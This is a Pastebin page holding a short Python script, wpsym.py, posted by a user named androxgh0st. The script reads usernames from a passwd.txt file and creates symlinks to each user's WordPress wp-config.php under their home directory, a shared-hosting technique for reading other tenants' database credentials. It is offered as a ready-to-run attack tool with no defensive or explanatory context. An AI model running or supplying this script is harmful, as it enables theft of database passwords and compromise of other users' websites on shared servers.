Advertisement
androxgh0st

wpsym.py

Mar 5th, 2020
335
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Python 0.24 KB | None | 0 0
  1. # -*- coding: utf-8 -*-
  2. import os
  3. passwd = open("passwd.txt").read()
  4. for i in passwd.splitlines():
  5.     x = i.split(":")
  6.     user = x[0]
  7.     os.system("ln -s /home/"+user+"/public_html/wp-config.php "+user+"-Wordpress.txt")
  8. print("Dah selesai lur")
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement